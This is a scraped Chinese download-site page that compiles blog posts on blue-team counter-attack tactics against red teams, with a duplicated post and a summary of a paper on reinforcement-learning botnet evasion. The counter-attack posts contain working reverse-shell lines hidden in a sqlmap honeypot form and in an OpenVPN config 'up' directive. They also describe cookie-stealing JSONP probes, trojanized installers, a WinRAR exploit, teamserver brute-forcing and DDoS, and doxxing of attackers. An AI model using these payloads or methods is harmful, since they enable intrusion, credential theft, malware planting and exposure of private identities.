精华内容
下载资源
问答
  • 信息网对抗制的攻防分析:网络对抗机制泛指网络攻击、防御的方式及其各自实现的策略或过程。网络攻防双方对抗的焦点是信息资源的可用性、机密性和完整性。目前,网络攻击方式可...|下载前务必先预览,自己验证一下...
  • 红蓝对抗-反

    万次阅读 2020-11-30 18:35:36
    CATALOG1.前言2. 1.前言 初次接触反技术,写一个文档作为记录。 2.

    1.前言

    初次接触反制技术,写一个文档作为记录。

    2.反制中常见技术点

    在这里插入图片描述

    1.蜜罐

    蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。

    1.1 放置高交互蜜罐

    放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。

    1.2 放置多个容易被发现的蜜罐

    放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真实核心系统。

    1.3 在蜜罐中使用JSONP探针

    蜜罐中设置一个网页,网页中写入指定的代码。当攻击者访问指定网页的时候,就会窃取攻击者的cookie并上传到服务器上,被窃取的cookie是可以被指定的,例如可以窃取攻击者登陆百度的cookie,登陆豆瓣的cookie等,可以通过此来得到攻击者画像,获取黑客的ip地址,分别通过webrtc与淘宝接口。但是在最新版的浏览器中,webrtc因为隐私问题,已经被浏览器禁止通过该接口获取用户ip。淘宝接口从浏览器端调用该接口的话,获取的ip准确度较高。
    条件:

    1. 攻击者登陆过社交媒体并且未退出账号
    2. 拥有相关媒体的jsonp接口

      参考文章:
      利用社交账号精准溯源的蜜罐技术
      利用webrtc获取真实ip
      JSONP探针

    1.4 蜜罐挂马

    留几个文件下载链接,例如vpn客户端,并对正常程序进行木马植入。或者制作恶意的excel文档诱导其进行下载。
    蜜罐中放置恶意安装包,参考文章DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用

    2.信息干扰

    红队攻击前都会进行信息收集,一般都是通过天眼查,github,gitlab等,我们可以在github上放置恶意exp或者无效等源代码,可以拖延红队的攻击实现,甚至实现反制(如果红队运行了我们的恶意exp的话),然后通过网络故意透露我们的蜜罐信息,诱导红队去攻击蜜罐,进而得到黑客画像。

    3.反击思路

    3.1 反制钓鱼页面

    直接对钓鱼页面进行web渗透攻击,尝试直接控制。攻防演戏开始前期,红队成员肯定会用许多肉鸡去对目标资产进行批量漏洞扫描,或者自己使用肉鸡生成钓鱼页面等,这些肉鸡基本都含有漏洞,这时候去反击成功率会比较高。

    3.2 反制钓鱼邮件

    1. 对附件进行逆向分析,得到C2地址,然后对目标ip进行渗透攻击。
      通过邮箱求手机号码可见:已知邮箱,求手机号码?
      有一个网站可以查询利用目标邮箱注册过的网站:查找邮箱注册过的网站
    2. 发现钓鱼邮件后,将钓鱼邮件放在我们提前配置好的蜜罐中执行,在蜜罐中放上恶意的加入木马的vpn安装包与密码本,等待攻击者下载并连接。

    补充:放置邮件探针

    思路:放置一个邮件,提前告诉大家不要点,然后攻防演戏期间有人点了的话十有八九就是因为账号被控了。

    3.3 反制攻击工具

    倘若对方使用带有漏洞版本的攻击工具例如蚁剑、AWVS等,这时候可以使用RCE攻击对其进行反控,高版本蚁剑上此漏洞已经被修复。
    已知有漏洞的工具版本:

    1. 蚁剑 <=2.0.7
      暂无直接可用exp。

    2. awvs 10
      直接利用exp,等待对方扫描自己,即刻上线。exp下载地址:https://github.com/dzonerzy/acunetix_0day
      也可以利用CSRF漏洞去反击。

      参考文章:
      论如何反击用AWVS的黑客
      如何优雅的反击扫描你网站的黑客

    3. cs 3.5
      只有3.5及以下版本可能被利用,且无直接可用exp,参考文章Cobalt Strike team服务被爆RCE漏洞,尽快升级最新版!

    4. sqlmap
      构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为`ls`l,倘若直接改成反弹shell的代码即可反控对方机器。
      在这里插入图片描述
      post方式的利用:
      页面代码:

      <html>
      <head>
      <title> A sqlmap honeypot demo</title>
      </head>
      <body>
      
      username:<input type="text" name="username" >
      <form id="myForm" action="username.php" method="post" enctype="text/plain">
      <input type='hidden' name='name' value='sdf&sadf=sadf&command="&&whoami"'>
      <input type="submit" οnclick="myForm.submit()" value="Submit">
      </form>
      </body>
      </html>
      

      burp截图:
      在这里插入图片描述

    在这里插入图片描述

    如果红队成员不仔细看post数据,就有可能直接复制黏贴post请求放在sqlmap里面跑,这样子就会被蓝队控制,但如果直接复制包的所有数据用sqlmap -r命令的话是不会被控制的。
    参考文章:注意了,使用sqlmap的你可能踩中了蜜罐

    1. msf v=Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
      msf中直接有利用脚本,路径为exploit/multi/http/metasploit_static_secret_key_base。
      可以在shodan上直接搜索互联网侧的msf:title:"metasploit is initializing"
      参考文章:Metasploit 反序列化漏洞

      浅谈蚁剑RCE
      嵌入式浏览器安全杂谈-electron框架
      中国蚁剑源码分析
      论如何反击用AWVS的黑客
      使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了

    3.4 反制XSS盲打

    我们遇见了XSS盲打攻击时,可以选择将虚假信息回传给XSS平台并反制攻击者。具体实现:

    1. 在蜜罐上配置一个后台管理系统的一个页面,让这个页面存在XSS漏洞。
    2. 页面的背后逻辑是,如果账号密码验证成功则显示当前IP不在准入名单中,然后弹到另一个页面,另一个页面是下载页面,这个页面上部署一个植入木马的程序(例如软件安装包),诱导攻击者下载。

    参考文章:看蓝队如何干翻你,浅谈蓝队反制手段!

    3.5 利用winrar漏洞

    条件:安装winrar软件
    实现的效果:攻击者下载我们制作好的恶意rar文件,在自己电脑上利用winrar解压后,就会将我们事先指定的exe文件解压到当前用户的开机启动文件夹下,等机器重启的时候就会运行我们事先安排的exe文件。

    利用:https://github.com/WyAtu/CVE-2018-20250

    3.6 利用openvpn客户端配置文件后门进行反制

    我们可以在服务器上留下一个openvpn客户端的后门文件,里面的部分内容如下:

    remote 192.168.31.137
    ifconfig 10.200.0.2 10.200.0.1
    dev tun
    script-security 2
    up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.31.138/9090 0<&1 2>&1&'"
    

    我们可以先做一个蜜罐,比如说蜜罐就是192.168.31.137,且这个ip可以被攻击者反问到。在蜜罐上面只配置openvpn服务,然后将上面的openvpn客户端文件放在另一台主机上,最好是台windows主机且无法执行openvpn命令,这样子攻击者就不得不下载这个配置文件进行利用。
    当攻击者下载openvpn配置文件到本地进行sudo openvpn example.ovpn后,就会执行我们事先写入的反弹shell的命令,进而达到反控的效果。

    参考文章:
    从OpenVPN配置文件中创建反弹Shell实现用户系统控制
    对某攻击队的Webshell进行分析

    3.7 反制coablt strike

    1.反制钓鱼

    在隔离网段机器上批量启动钓鱼文件,DDOS红队的Teamserver,利用脚本
    参考文章:蓝色吃定红色-爆破CS Teamserver 密码

    2.爆破CS密码

    一般情况下CS都会设置在50050端口,且密码相对都会比较简单,我们可以使用脚本去破解其密码直接连接其服务端然后进行其他操作。爆破脚本:脚本下载地址

    3.假上线

    只发送心跳包,让CS以为我们已经上线,这时候攻击者只会看到上线信息但无法执行任何命令。
    利用代码:

    
    import re
    import time
    import requests
    
    def heartbeat():
        url = "http://192.168.186.133:333/activity"
        headers = {
                'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
                'Host': '192.168.186.133:333',
                'Accept': '*/*',
                'Connection': 'Keep-Alive',
                'Cache-Control': 'no-cache',
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
            }
        resp = requests.get(url=url,headers=headers)
        text = resp.content.hex()
        return text
    
    x = True
    while x:
        text = heartbeat()
        lengs = len(text)
        # print(lengs, "    ", text)
    
        if '2f4320' in text and '000041' in text:
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    
            commeds = re.findall(r'2f4320(.*?)000041', text)
            for comm in commeds:
                commed = bytes.fromhex(comm).decode('utf-8')
                print(commed)
        time.sleep(5)
    

    脚本下载地址:fake_online
    参考文章:看我如何模拟Cobalt Strike上线欺骗入侵者

    3.8反制dnslog与httplog

    1. 对常见的dnslog平台进行屏蔽。
    2. 在站长之家上利用多地ping检测来对目标对dnslog域名进行攻击,达到混淆视听的效果,例如对方的dnslog域名为zzz.test.com,我们就可以去ping administrator.zzz.test.com即可,达到混淆视听的目的。

    溯源

    1. 溯源目标模版:

    姓名/ID:

    攻击IP:

    地理位置:

    QQ:

    IP地址所属公司:

    IP地址关联域名:

    邮箱:

    手机号:

    微信/微博/src/id证明:

    人物照片:

    跳板机(可选):

    关联攻击事件:

    2. 溯源思路

    1. 登陆受害机器进行信息收集
      如果是linux可以查看命令执行历史与其他相关日志文件。
      如果是windows可以查询ID == 4625审核失败的日志,后续通过对时间的排查、以及源IP地址、类型与请求的频率进行分析来判断是否是来源于内网的暴力破解,通过对logontype的数值确认就可以确认到底是通过什么协议进行暴力破解成功的。相对的数值关系:

      local WINDOWS_RDP_INTERACTIVE = “2”
      local WINDOWS_RDP_UNLOCK = “7”
      local WINDOWS_RDP_REMOTEINTERACTIVE = “10”
      local WINDOWS_SMB_NETWORK = “3”

    2. 针对IP或者域名通过公网已有的开放信息进行查询

    https://x.threatbook.cn/

    https://ti.qianxin.com/

    https://ti.360.cn/

    https://www.venuseye.com.cn/

    https://community.riskiq.com/
    在这里插入图片描述

    1. 定位目标
      利用精确ip定位进行目标的位置定位。
    2. 收集互联网侧的用户ID
      收集手机号与互联网上的各种ID信息(利用google hacking)。
    3. 进入跳板机进行信息收集
      如果有能力控制了红队的跳板机,则可进入跳板机进行信息收集,查看命令执行的历史记录与日志等。

    参考文章

    从OpenVPN配置文件中创建反弹Shell实现用户系统控制
    对某攻击队的Webshell进行分析
    利用winrar漏洞
    看蓝队如何干翻你,浅谈蓝队反制手段!
    浅谈蚁剑RCE
    嵌入式浏览器安全杂谈-electron框架
    中国蚁剑源码分析
    论如何反击用AWVS的黑客
    DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用
    已知邮箱,求手机号码?
    JSON探针
    蓝队实战溯源反制手册分享
    攻防演练中防守方的骚姿势
    看我如何模拟Cobalt Strike上线欺骗入侵者
    蓝色吃定红色-爆破CS Teamserver 密码
    利用webrtc获取真实ip
    JSONP探针

    展开全文
  • 在针对基于ML的网络入侵检测系统(NIDS)的对抗逃避攻击的情况下,我们提出了一种新颖的方法,该方法利用深度强化学习(DRL)来提高依赖于网络流分析的检测器的健壮性。我们的建议允许自动生成现实的对抗性样本,以...

    Deep Reinforcement Adversarial Learning Against Botnet Evasion Attacks

    摘要简介:

    在针对基于ML的网络入侵检测系统(NIDS)的对抗逃避攻击的情况下,我们提出了一种新颖的方法,该方法利用深度强化学习(DRL)来提高依赖于网络流分析的检测器的健壮性。我们的建议允许自动生成现实的对抗性样本,以保留其潜在的恶意逻辑并可以以很高的概率规避检测通过基于自动生成的样本的对抗训练程序,对检测器进行加固。据我们所知,本文代表了第一个提议,该提议利用深度强化学习来通过对抗训练强化僵尸网络检测器。在我们的研究中,我们考虑了构成网络安全领域的真正限制。它们包括通过小而可行的修改来创建对抗性样本的必要性,还暗示了攻击者为逃避检测而进行的查询数量有限。此外,对抗训练需要准确的分析,因为在没有对抗攻击的情况下,它甚至可能会降低检测性能

    方法:

    灰盒假设前提:

    1. 不知道完整的特征集
    2. time- and data-related information 因为基于流的检测器基本上都是使用的方式

    在这里插入图片描述

    以上的特征是比较公认的特征,然后攻击者所基于的特征,这里有一个疑问对于IP为什么是bool类型的。

    典型的对抗样本可能呈现不同的持续时间,不同数量的交换字节或传输的数据包,修改这些特征的值会影响表I中的多个属性,因为其中一些是衍生功能。作者考虑更改对不损害僵尸网络基本逻辑。

    准备阶段:

    1、创建DRL代理,针对某种类型僵尸网络代理自动生成可逃避的对抗样本,并且需要保留恶意软件的底层逻辑,同时还需要考虑到探测检测器边界的次数。

    2、环境,包括两个元素:一是状态生成器;二是一个僵尸网络检测器D‘(T)在数据集T上训练的检测器。

    3、奖励,由检测器的输出决定(标签翻转了基于奖励,没有就没有奖励),代理会一致修改样本知道能够逃避检测或者到达最大的修改数量

    4、动作空间,对一些特征的小增量,(duration, sent bytes,received bytes, transmitted packets) and correlated features.

    5、算法选择:

    DDQN可以避免DQN对现实网络的过估计,期望快速和低成本的迭代过程,并且需要很少的查询就可以逃逸

    基于Sarsa的代理将尝试通过选择更小的修改来逃避检测,但以增加迭代次数为代价。

    准备阶段的DRL代理A(b)被训练为根据属于T中包含的僵尸网络b的网络流生成对抗性样本。

    样本生成流程:

    1、输入恶意流样本到state generator

    2、生成器将恶意样本给到agent,agent产输出修改样本的动作给generator

    3、generator根据输出进行修改,输出给检测器

    4、检测器输出判断结果,如果没有成功那么会没有奖励

    硬化模型:

    通过逃逸样本对模型进行对抗训练,作者做了一个实验,对注入不同比率的对抗样本,对检测器性能的影响

    实验:

    数据集:

    CTU and the BOTNET ISCX

    检测器:

    1、RF随机森林

    2、WnD

    均使用8-2分用于训练和测试,恶意流量与良性流量比率1:20,每个僵尸网络家族均训练一个检测器,因此每个数据集一共五个分类器。

    样本修改的细节

    • 将每个特征的扰动增量限制为最多两个单位,代理可以将持续时间增加1或2秒,或者可以通过增加1或2个数据包来修改Total Pkt。
    • 由于是直接修改流级别的特征所以导致衍生特征值不一致,所以要进行相应的计算,源字节的增加需要每秒字节的增加,由于修改的幅度很小(最多为+2个单位),我们不需要更新Duration,因为在同一时间范围内通过数据包或字节传输更多数据是现实可行的。
    • 有限的查询数量

    攻击实现:

    作者设想了三种场景:

    1、E1,修改样本次数设置为5次

    2、E2,通过手动修改最多四个特征(持续时间,源字节,目标字节,总数据包)的组合来更改检测器,这些特征以固定量更改,即(+ 1,+ 2,+ 5,+ 10,+ 30)。

    3、E3,(1, 2, 5, 10, 30)-> (1.5, 3.5, 7.5, 20),一个未知的攻击持续时间的探索

    由于用于对抗训练的增强数据集包括模仿相应攻击模式的样本,因此我们可以预期,当攻击类型为E1时,经过我们框架加固的检测器可以获得更好的结果,而在E2场景中,手动方法应该会产生更好的结果。另一方面,E3中的对抗性样本代表了无法预料的攻击,因此,即使在这种情况下,我们的强化方法也非常有效

    评价:

    每个基线检测器的前5个最重要特征的排名:发现total_pkts这个特征比较重要。
    在这里插入图片描述

    以Qmax = 8 0生成的样本的ER逃逸率和平均查询数量Qavg(在括号中)。与基于Sarsa的代理相比,基于2DQN的代理需要更少的逃避检测尝试。

    在这里插入图片描述

    以Qmax = 1或5的情况下的逃逸率

    在这里插入图片描述

    本文和六室的很像,可以查询次数为啥这么少???

    [4]没有考虑基线检测器的特征的重要性

    硬化模型的效果如下:
    在这里插入图片描述

    进行注入样本率的敏感性比较:这个实验不考虑了,没有什么意义

    仔细一读这篇文章感觉又没有什么用了,写的也不是很清晰。

    没有相应的实际的算法和流程,没有比较详细的DRL的定义,实验做了很多,有一些目的,但是方法还是没特点。不过立意不错。

    展开全文
  • 红蓝对抗中的溯源反实战.pdf
  • 不但踩了“蜜罐”可能还要被团灭了 3.4 反XSS盲打 我们遇见了XSS盲打攻击时,可以选择将虚假信息回传给XSS平台并反攻击者。具体实现: 在蜜罐上配置一个后台管理系统的一个页面,让这个页面存在XSS漏洞。 页面的...

    1.蜜罐

    蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。

    1.1 放置高交互蜜罐

    放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。

    1.2 放置多个容易被发现的蜜罐

    放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真实核心系统。

    1.3 在蜜罐中使用JSONP探针

    蜜罐中设置一个网页,网页中写入指定的代码。当攻击者访问指定网页的时候,就会窃取攻击者的cookie并上传到服务器上,被窃取的cookie是可以被指定的,例如可以窃取攻击者登陆百度的cookie,登陆豆瓣的cookie等,可以通过此来得到攻击者画像,获取黑客的ip地址,分别通过webrtc与淘宝接口。但是在最新版的浏览器中,webrtc因为隐私问题,已经被浏览器禁止通过该接口获取用户ip。淘宝接口从浏览器端调用该接口的话,获取的ip准确度较高。
    条件:

    1. 攻击者登陆过社交媒体并且未退出账号

    2. 拥有相关媒体的jsonp接口

    参考文章:
    利用社交账号精准溯源的蜜罐技术
    利用webrtc获取真实ip

    JSONP探针

    1.4 蜜罐挂马

    留几个文件下载链接,例如vpn客户端,并对正常程序进行木马植入。或者制作恶意的excel文档诱导其进行下载。
    蜜罐中放置恶意安装包,参考文章DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用

    2.信息干扰

    红队攻击前都会进行信息收集,一般都是通过天眼查,github,gitlab等,我们可以在github上放置恶意exp或者无效等源代码,可以拖延红队的攻击实现,甚至实现反制(如果红队运行了我们的恶意exp的话),然后通过网络故意透露我们的蜜罐信息,诱导红队去攻击蜜罐,进而得到黑客画像。

    3.反击思路

    3.1 反制钓鱼页面

    直接对钓鱼页面进行web渗透攻击,尝试直接控制。攻防演戏开始前期,红队成员肯定会用许多肉鸡去对目标资产进行批量漏洞扫描,或者自己使用肉鸡生成钓鱼页面等,这些肉鸡基本都含有漏洞,这时候去反击成功率会比较高。

    3.2 反制钓鱼邮件

    1. 对附件进行逆向分析,得到C2地址,然后对目标ip进行渗透攻击。
      通过邮箱求手机号码可见:已知邮箱,求手机号码?
      有一个网站可以查询利用目标邮箱注册过的网站:查找邮箱注册过的网站

    2. 发现钓鱼邮件后,将钓鱼邮件放在我们提前配置好的蜜罐中执行,在蜜罐中放上恶意的加入木马的vpn安装包与密码本,等待攻击者下载并连接。

    3.3 反制攻击工具

    倘若对方使用带有漏洞版本的攻击工具例如蚁剑、AWVS等,这时候可以使用RCE攻击对其进行反控,高版本蚁剑上此漏洞已经被修复。
    已知有漏洞的工具版本:

    1. 蚁剑 <=2.0.7
      暂无直接可用exp。

    2. awvs 10
      直接利用exp,等待对方扫描自己,即刻上线。exp下载地址:https://github.com/dzonerzy/acunetix_0day
      也可以利用CSRF漏洞去反击。

      参考文章:
      论如何反击用AWVS的黑客
      如何优雅的反击扫描你网站的黑客

    3. cs 3.5
      只有3.5及以下版本可能被利用,且无直接可用exp,参考文章Cobalt Strike team服务被爆RCE漏洞,尽快升级最新版!。

    4. sqlmap
      构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为`ls`l,倘若直接改成反弹shell的代码即可反控对方机器。

    post方式的利用:
    页面代码:

    <html>
    <head>
    <title> A sqlmap honeypot demo</title>
    </head>
    <body>
    <input>search the user</input>
    <form id="myForm" action="username.html" method="post" enctype="text/plain">
    <input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/>
    <input type="button"οnclick="myForm.submit()" value="Submit">
    </form>
    </body>
    </html>

    burp截图:

    如果红队成员不仔细看post数据,就有可能直接复制黏贴这个包放在sqlmap里面跑,这样子就会被蓝队控制。

    参考文章:注意了,使用sqlmap的你可能踩中了蜜罐

    5. msf v=Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
    msf中直接有利用脚本,路径为exploit/multi/http/metasploit_static_secret_key_base。
    可以在shodan上直接搜索互联网侧的msf:title:"metasploit is initializing"

    参考文章:Metasploit 反序列化漏洞

    浅谈蚁剑RCE
    嵌入式浏览器安全杂谈-electron框架
    中国蚁剑源码分析
    论如何反击用AWVS的黑客
    使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了

         3.4 反制XSS盲打

    我们遇见了XSS盲打攻击时,可以选择将虚假信息回传给XSS平台并反制攻击者。具体实现:

    1. 在蜜罐上配置一个后台管理系统的一个页面,让这个页面存在XSS漏洞。

    2. 页面的背后逻辑是,如果账号密码验证成功则显示当前IP不在准入名单中,然后弹到另一个页面,另一个页面是下载页面,这个页面上部署一个植入木马的程序(例如vpn),诱导攻击者下载。

    参考文章:

    看蓝队如何干翻你,浅谈蓝队反制手段!

    3.5 利用winrar漏洞

    条件:安装winrar软件
    实现的效果:攻击者下载我们制作好的恶意rar文件,在自己电脑上利用winrar解压后,就会将我们事先指定的exe文件解压到当前用户的开机启动文件夹下,等机器重启的时候就会运行我们事先安排的exe文件。

    利用:https://github.com/WyAtu/CVE-2018-20250

    3.6 利用openvpn客户端配置文件后门进行反制

    我们可以在服务器上留下一个openvpn客户端的后门文件,里面的部分内容如下:

    remote 192.168.31.137
    ifconfig 10.200.0.2 10.200.0.1
    dev tun
    script-security 2
    up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.31.138/9090 0<&1 2>&1&'"

    我们可以先做一个蜜罐,比如说蜜罐就是192.168.31.137,且这个ip可以被攻击者反问到。在蜜罐上面只配置openvpn服务,然后将上面的openvpn客户端文件放在另一台主机上,最好是台windows主机且无法执行openvpn命令,这样子攻击者就不得不下载这个配置文件进行利用。

    当攻击者下载openvpn配置文件到本地进行sudo openvpn example.ovpn后,就会执行我们事先写入的反弹shell的命令,进而达到反控的效果。

    参考文章:
    从OpenVPN配置文件中创建反弹Shell实现用户系统控制

    对某攻击队的Webshell进行分析

    3.7 反制coablt strike

    1.反制钓鱼

    在隔离网段机器上批量启动钓鱼文件,DDOS红队的Teamserver,利用脚本。
    参考文章:蓝色吃定红色-爆破CS Teamserver 密码

    2.爆破CS密码

    一般情况下CS都会设置在50050端口,且密码相对都会比较简单,我们可以使用脚本去破解其密码直接连接其服务端然后进行其他操作。爆破脚本:脚本下载地址

    3.假上线

    只发送心跳包,让CS以为我们已经上线,这时候攻击者只会看到上线信息但无法执行任何命令。
    利用代码:

    import re
    import time
    import requests
    
    def heartbeat():
        url = "http://192.168.186.133:333/activity"
        headers = {
    'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
    'Host': '192.168.186.133:333',
    'Accept': '*/*',
    'Connection': 'Keep-Alive',
    'Cache-Control': 'no-cache',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
            }
        resp = requests.get(url=url,headers=headers)
        text = resp.content.hex()
    return text
    
    x = True
    while x:
        text = heartbeat()
        lengs = len(text)
    # print(lengs, "    ", text)
    
    if '2f4320' in text and '000041' in text:
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    
            commeds = re.findall(r'2f4320(.*?)000041', text)
    for comm in commeds:
                commed = bytes.fromhex(comm).decode('utf-8')
                print(commed)
        time.sleep(5)

    脚本下载地址:https://github.com/shanfenglan/fake_online/tree/main
    参考文章:看我如何模拟Cobalt Strike上线欺骗入侵者

     

    3.8反制dnslog与httplog

    1. 对常见的dnslog平台进行屏蔽。

    2. 在站长之家上利用多地ping检测来对目标对dnslog域名进行攻击,达到混淆视听的效果,例如对方的dnslog域名为zzz.test.com,我们就可以去ping administrator.zzz.test.com即可,达到混淆视听的目的。

    三、溯源

    1. 溯源目标模版:

    • 姓名/ID:
    • 攻击IP:
    • 地理位置:
    • QQ:
    • IP地址所属公司:
    • IP地址关联域名:
    • 邮箱:
    • 手机号:
    • 微信/微博/src/id证明:
    • 人物照片:
    • 跳板机(可选):
    • 关联攻击事件:

    2. 溯源思路

    1. 登陆受害机器进行信息收集
      如果是linux可以查看命令执行历史与其他相关日志文件。
      如果是windows可以查询ID == 4625审核失败的日志,后续通过对时间的排查、以及源IP地址、类型与请求的频率进行分析来判断是否是来源于内网的暴力破解,通过对logontype的数值确认就可以确认到底是通过什么协议进行暴力破解成功的。相对的数值关系:

      local WINDOWS_RDP_INTERACTIVE = “2”
      local WINDOWS_RDP_UNLOCK = “7”
      local WINDOWS_RDP_REMOTEINTERACTIVE = “10”
      local WINDOWS_SMB_NETWORK = “3”

    2. 针对IP或者域名通过公网已有的开放信息进行查询

    https://x.threatbook.cn/

    https://ti.qianxin.com/

    https://ti.360.cn/

    https://www.venuseye.com.cn/

    https://community.riskiq.com/

         3. 定位目标
             利用精确ip定位进行目标的位置定位。

         4. 收集互联网侧的用户ID
             收集手机号与互联网上的各种ID信息(利用google hacking)。

         5. 进入跳板机进行信息收集
             如果有能力控制了红队的跳板机,则可进入跳板机进行信息收集,查看命令执行的历史记录与日志等。

     

    四、参考文章

    从OpenVPN配置文件中创建反弹Shell实现用户系统控制

    - https://www.freebuf.com/articles/terminal/175862.html

     

    对某攻击队的Webshell进行分析

    - https://gh0st.cn/archives/2019-08-21/1

     

    利用winrar漏洞

    - https://github.com/WyAtu/CVE-2018-20250

     

    看蓝队如何干翻你,浅谈蓝队反制手段!

    - https://my.oschina.net/u/4579491/blog/4499994

     

    浅谈蚁剑RCE

    - https://xz.aliyun.com/t/8167

     

    嵌入式浏览器安全杂谈-electron框架

    - http://www.f4ckweb.top/index.php/archives/103/

     

    中国蚁剑源码分析

    - https://yzddmr6.tk/posts/antsword-diy-4/

     

    论如何反击用AWVS的黑客

    - https://www.freebuf.com/news/136476.html

     

    DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用

    - https://mp.weixin.qq.com/s?__biz=MzU2NTc2MjAyNg==&mid=2247484016&idx=1&sn=c4cd2db916f27a91fd179dbad78dd675&scene=21#wechat_redirect

     

    已知邮箱,求手机号码?

    - https://mp.weixin.qq.com/s?__biz=MzI3NTExMDc0OQ==&mid=2247483802&idx=1&sn=e4317bcbc3e78ddf4c2715298ef197f2&scene=21#wechat_redirect

     

    JSON探针

    - https://lcx.cc/post/4444/

     

    蓝队实战溯源反制手册分享

    - https://sec.nmask.cn/article_content?a_id=81963be55e7e0658827dca12219ddc75

     

    攻防演练中防守方的骚姿势

    - https://www.anquanke.com/post/id/219059

     

    看我如何模拟Cobalt Strike上线欺骗入侵者

    - https://k8gege.org/p/40523.html

     

    蓝色吃定红色-爆破CS Teamserver 密码

    - https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw

     

    利用webrtc获取真实ip

    - https://blog.csdn.net/leafrenchleaf/article/details/84743313

     

    JSONP探针

    - https://lcx.cc/post/4444/

    展开全文
  • 棋 在pygame中制作的国际象棋。 您可以与AI或其他人对抗
  • 有朋友说这是:用“造假”来对抗造假。 是的,它是! 编程 有了想法之后,迅速实现了一个可以线上预览的 DEMO (最开始只有微博这一项)。于此同时,在v2ex有人@我说之前创建的TheGreatJavaScript(Github ...
  • “网络安全的本质是对抗对抗的本质是攻防两端能力的较量。”不管是每年的网络攻防专项行动,还是重要时期网络信息安全保障都逐渐成为众多政府、企业用户的工作日常,高对抗性俨然成为网络安全攻防的...
  • 最近想搞一搞GAN,但是发现《Pytorch入门与实践——AI插画师:生成对抗网络》,但是发现数据集的链接失效了,所以自己制作一份。 代码来自https://www.zhihu.com/people/he-zhi-yuan-16,我做了一些修改。 1、用...
  • 红蓝对抗系列之浅谈蓝队反红队的手法一二 取证反查 针对ip 溯源一二 一般来说,红队大部分都是使用代理节点进行测试,假如我们捕获或者从样本里面分析拿到了真实ip ,那么以下操作场景就有用了,或者使用钓鱼反...
  • 使用Tensorflow实现了四种对抗性图像制作算法。 攻击文件夹中可以找到四种攻击算法。 实施遵循原则tensor-in, tensor-out。 它们都返回一个Tensorflow操作,可以通过sess.run(...)运行。 Fast Gradient Sign ...
  • 一实战对抗中的攻击套路实战对抗的典型场景——攻防演练,有两个显著特点:▶ 短期的高强度网络对抗▶有条件限定的模拟攻防演练虽然只是模拟的攻防演练,但也是在一定条件下无限接近于真实的攻击场...
  • 本文给出完整代码实现CNN模型的类别可视化输入图像——类印象图,并基于此生成对抗样本图像。
  • 最近,一位在医院工作的猫奴生物统计学家Alexia,使用最新的生成式对抗网络GAN来 测试 深度学习的画猫技术。相比吴恩达三天才能画出来的猫,GAN的新方法仅用几个小时就能搞定,画出来猫咪也好看很多。这里的新方法在...
  • 使用TensorFlow生成对抗样本

    千次阅读 2017-10-24 10:12:03
    如果说卷积神经网络是昔日影帝的话,那么生成对抗已然成为深度学习研究领域中一颗新晋的耀眼新星,它将彻底地改变我们认知世界的方式。对抗学习训练为指导人工智能完成复杂任务提供了一个全新的思路,生成对抗图片...
  • 生成对抗网络

    2020-08-18 19:05:16
    文章目录1 生成对抗网络初识2 生成对抗网络算法2.1 判别网络2.2 生成网路2.3 训练欢迎关注微信公众号:`二进制人工智能` 1 生成对抗网络初识 让我们先用一个小例子来认识一下生成对抗网络。首先我们来认识一下生成...
  • 不多说了。。。。。。。。。。。。。。。。
  • 不多说了。。。。。。。。。
  • 没时间看,先传上来。。。。
  • 因此,为了研究现代深度哈希模型对对抗性摄动的鲁棒性,我们提出了哈希对抗性生成(HAG),这是一种为汉明空间搜索制作对抗性示例的新颖方法。 HAG的主要目标是生成不易察觉的示例作为查询,其与目标哈希模型的最近...
